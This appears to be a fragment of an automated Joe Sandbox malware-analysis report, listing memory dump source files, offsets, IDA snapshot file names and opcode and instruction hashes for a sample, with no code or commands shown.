                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a3e8aa6ac049f9ab4affdaf1cef375ae450392219bab8c7e838fde8bb1c81ad
                                                                                                                                  • Instruction ID: fb392f906a8bd58f36e87ef8285675534f6b388b9797f3ebc5245ee8eb12ad42
                                                                                                                                  • Opcode Fuzzy Hash: 3a3e8aa6ac049f9ab4affdaf1cef375ae450392219bab8c7e838fde8bb1c81ad
                                                                                                                                  • Instruction Fuzzy Hash: 0FC04C41F5D85A16F25A66144521A7D04535F5471CF990578F51EC72CECE5C5A0242C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd